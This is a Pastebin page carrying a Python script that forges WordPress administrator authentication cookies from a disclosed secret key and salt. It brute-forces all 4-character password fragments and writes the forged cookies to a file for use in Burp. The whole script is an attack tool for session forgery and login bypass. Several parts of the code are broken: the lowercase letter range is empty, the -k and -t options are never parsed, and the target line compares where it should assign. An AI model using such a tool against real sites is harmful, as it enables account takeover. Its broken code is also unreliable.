API tools faq
paste
ToKeiChun

WordPress Auth Cookie Generator

ToKeiChun
Jan 23rd, 2021
1,210
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.28 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #
  3. ##############################################################################
  4. # Title:    WordPress Auth Cookie Generator Demo
  5. # Author:   Mike Czumak (T_v3rn1x) - @SecuritySift - securitysift.com
  6. # Purpose:  Generates WP auth cookies (requires valid Secret Key and Salt)
  7. # License:  You may modify and/or distribute freely, as long as it is not
  8. #           used maliciously or incorporated into any commercial product
  9. ##############################################################################
  10.  
  11. import hmac, hashlib, string, sys, getopt
  12.  
  13. # generate an md5 hash with salt in same manner as WP
  14. def wp_hash(data, key, salt):
  15.     wpsalt = key + salt
  16.     hash =  hmac.new(wpsalt, data, hashlib.md5).hexdigest()
  17.     return hash
  18.  
  19. # generate array of all 4 character password frags given a range of
  20. # upper and lower case letters numbers 0-9, slash (/) and period (.)
  21. def gen_pass_frag():
  22.  
  23.     lowerletters = list(map(chr, range(ord('a'), ord('Z')+1)))
  24.     upperletters = list(map(chr, range(ord('A'), ord('Z')+1)))
  25.     numbers = list(map(chr, range(ord('0'), ord('9')+1)))
  26.     specchars = ['/', '.'];
  27.     allchars = lowerletters + upperletters + numbers + specchars
  28.     frags = ''; # hold concatenated list of all 4-char frag combos
  29.     count = 0; # loop counter
  30.  
  31.     #generate all possible 4-character combinations for $pass_frag
  32.     for f1 in allchars:
  33.         for f2 in allchars:
  34.             for f3 in allchars:
  35.                 for f4 in allchars:
  36.                     frags += f1+f2+f3+f4+',';
  37.                     count += 1;
  38.                    
  39.     frags = frags.rstrip(',') # remove trailing comma
  40.     frag_array = frags.split(','); # split list into an array for iteration
  41.  
  42.     return frag_array
  43.  
  44. # generate all possible cookies for a given user
  45. def gen_cookies(username, expiration, pass_frag, key, salt, target):
  46.     frag_array = []
  47.     scheme = 'auth' # default auth scheme for wp
  48.    
  49.     # generate password frag combinations or use single frag passed as arg
  50.     if pass_frag == '':
  51.         frag_array = gen_pass_frag()
  52.     else:
  53.         frag_array = [pass_frag]
  54.    
  55.     cookie_id = 'wordpress_' + hashlib.md5(target).hexdigest() + '='
  56.     allcookies = '' # string to hold all generated cookies
  57.     i = 0 # loop counter
  58.    
  59.     # loop through each generated pass frag and build key/hash/cookie
  60.     for frag in frag_array:
  61.         hashkey = wp_hash(username + frag + '|' + expiration, key, salt)
  62.         hash = hmac.new(hashkey, username + '|' + expiration, hashlib.md5).hexdigest()
  63.         cookie = str(i) + ':' + frag + ':' + cookie_id + username + '%7C' + expiration + '%7C' + hash + '\n'
  64.         allcookies += cookie
  65.         i+=1
  66.  
  67.     print ('\n[+] Cookie gen complete. ' + str(i) + ' cookie(s) created.');
  68.    
  69.     if i == 1:
  70.         print '[+] Cookie: ' + allcookies.split(':')[2]
  71.     else:
  72.         # write cookies to file
  73.         filename = cookie_id.split('_')[1].split('=')[0] + '_' + username + '_cookies.txt'
  74.         f = open(filename, 'w')
  75.         f.write(allcookies)
  76.         f.close();
  77.         print ('[+] Cookies written to file [' + filename + ']\n')
  78.    
  79.  
  80. def main(argv):
  81.     username = 'admin' # default username
  82.     pass_frag = '' # default is to generate pass frags
  83.     expiration = '1577836800' # default expiration date (1/1/2020)
  84.     key = 'DisclosedKey'
  85.     salt = 'DisclosedSalt'
  86.     target = 'http://localhost/wordpress'
  87.    
  88.     print "\nWordPress Auth Cookie Generator"
  89.     print "Author: Mike Czumak (T_v3rn1x) - @SecuritySift - securitysift.com"
  90.     print "Purpose: Generates WP auth cookies (requires valid Secret Key and Salt)"
  91.  
  92.     usage = '''\nUsage: wpcookiegen.py\n\nOptions:
  93.     -u <username> (default is admin)
  94.     -f <pass_frag> (default/blank will generate all combos)
  95.     -e <expiration> (unix_date_stamp: default is 1/1/2020)
  96.     -k <key> (default is DisclosedKey)
  97.     -s <salt> (default is DisclosedSalt)
  98.     -t <target> (default is http://localhost/wordpress)\n\nNotes:
  99.     You can parse the cookie list directly in Burp with the following regex:
  100.     ^[0-9]*:[0-9a-zA-z\.\/]{4}:\n'''
  101.    
  102.     try:
  103.         opts, args = getopt.getopt(argv,'hu:f:e:s:')
  104.     except getopt.GetoptError:
  105.         print usage
  106.         sys.exit(2)
  107.        
  108.     for opt, arg in opts:
  109.         if opt == '-h':
  110.             print usage
  111.             sys.exit()
  112.         elif opt == '-u':
  113.             username = arg
  114.         elif opt == '-f':
  115.             pass_frag = arg
  116.         elif opt == '-e':
  117.             expiration = arg
  118.         elif opt =='-s':
  119.             salt = arg
  120.         elif opt == 'k':
  121.             key = arg
  122.         elif opt == 't':
  123.             target == arg
  124.  
  125.     gen_cookies(username,expiration,pass_frag, key, salt, target)
  126.  
  127. if __name__ == '__main__':
  128.     main(sys.argv[1:])
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!